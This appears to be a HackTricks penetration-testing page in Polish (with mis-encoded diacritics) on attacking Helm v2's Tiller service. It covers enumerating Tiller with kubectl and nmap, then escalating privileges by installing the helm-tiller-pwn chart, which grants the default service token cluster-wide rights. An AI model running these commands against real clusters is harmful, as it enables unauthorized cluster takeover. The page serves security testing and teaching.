{% hint style="success" %}
Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 馃挰 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 馃惁 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}
# Podstawowe informacje
Helm jest **mened偶erem pakiet贸w** dla Kubernetes. Umo偶liwia pakowanie plik贸w YAML i dystrybucj臋 ich w publicznych i prywatnych repozytoriach. Te pakiety nazywane s膮 **Helm Charts**. **Tiller** to **us艂uga** **dzia艂aj膮ca** domy艣lnie na porcie 44134, oferuj膮ca t臋 us艂ug臋.
**Domy艣lny port:** 44134
```
PORT STATE SERVICE VERSION
44134/tcp open unknown
```
# Enumeration
Je艣li mo偶esz **enumerowa膰 pody i/lub us艂ugi** r贸偶nych przestrzeni nazw, enumeruj je i szukaj tych z **"tiller" w ich nazwie**:
```bash
kubectl get pods | grep -i "tiller"
kubectl get services | grep -i "tiller"
kubectl get pods -n kube-system | grep -i "tiller"
kubectl get services -n kube-system | grep -i "tiller"
kubectl get pods -n | grep -i "tiller"
kubectl get services -n | grep -i "tiller"
```
Przyk艂ady:
```bash
kubectl get pods -n kube-system
NAME READY STATUS RESTARTS AGE
kube-scheduler-controlplane 1/1 Running 0 35m
tiller-deploy-56b574c76d-l265z 1/1 Running 0 35m
kubectl get services -n kube-system
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
kube-dns ClusterIP 10.96.0.10 53/UDP,53/TCP,9153/TCP 35m
tiller-deploy ClusterIP 10.98.57.159 44134/TCP 35m
```
Mo偶esz r贸wnie偶 spr贸bowa膰 znale藕膰 t臋 us艂ug臋, sprawdzaj膮c port 44134:
```bash
sudo nmap -sS -p 44134
```
Gdy ju偶 to odkryjesz, mo偶esz si臋 z nim komunikowa膰, pobieraj膮c aplikacj臋 klienck膮 helm. Mo偶esz u偶y膰 narz臋dzi takich jak `homebrew`, lub spojrze膰 na [**oficjaln膮 stron臋 wyda艅**](https://github.com/helm/helm/releases)**.** Aby uzyska膰 wi臋cej szczeg贸艂贸w lub inne opcje, zobacz [przewodnik instalacji](https://v2.helm.sh/docs/using\_helm/#installing-helm).
Nast臋pnie mo偶esz **enumerowa膰 us艂ug臋**:
```
helm --host tiller-deploy.kube-system:44134 version
```
## Eskalacja Uprawnie艅
Domy艣lnie **Helm2** zosta艂 zainstalowany w **namespace kube-system** z **wysokimi uprawnieniami**, wi臋c je艣li znajdziesz us艂ug臋 i masz do niej dost臋p, mo偶e to pozwoli膰 ci na **eskalacj臋 uprawnie艅**.
Wszystko, co musisz zrobi膰, to zainstalowa膰 pakiet taki jak ten: [**https://github.com/Ruil1n/helm-tiller-pwn**](https://github.com/Ruil1n/helm-tiller-pwn), kt贸ry da **domy艣lnemu tokenowi us艂ugi dost臋p do wszystkiego w ca艂ym klastrze.**
```
git clone https://github.com/Ruil1n/helm-tiller-pwn
helm --host tiller-deploy.kube-system:44134 install --name pwnchart helm-tiller-pwn
/pwnchart
```
W [http://rui0.cn/archives/1573](http://rui0.cn/archives/1573) masz **wyja艣nienie ataku**, ale zasadniczo, je艣li przeczytasz pliki [**clusterrole.yaml**](https://github.com/Ruil1n/helm-tiller-pwn/blob/main/pwnchart/templates/clusterrole.yaml) i [**clusterrolebinding.yaml**](https://github.com/Ruil1n/helm-tiller-pwn/blob/main/pwnchart/templates/clusterrolebinding.yaml) w _helm-tiller-pwn/pwnchart/templates/_ mo偶esz zobaczy膰, jak **wszystkie uprawnienia s膮 przyznawane domy艣lnemu tokenowi**.
{% hint style="success" %}
Ucz si臋 i 膰wicz Hacking AWS:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
Ucz si臋 i 膰wicz Hacking GCP: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Wsparcie HackTricks
* Sprawd藕 [**plany subskrypcyjne**](https://github.com/sponsors/carlospolop)!
* **Do艂膮cz do** 馃挰 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegram**](https://t.me/peass) lub **艣led藕** nas na **Twitterze** 馃惁 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Dziel si臋 trikami hackingowymi, przesy艂aj膮c PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repozytori贸w github.
{% endhint %}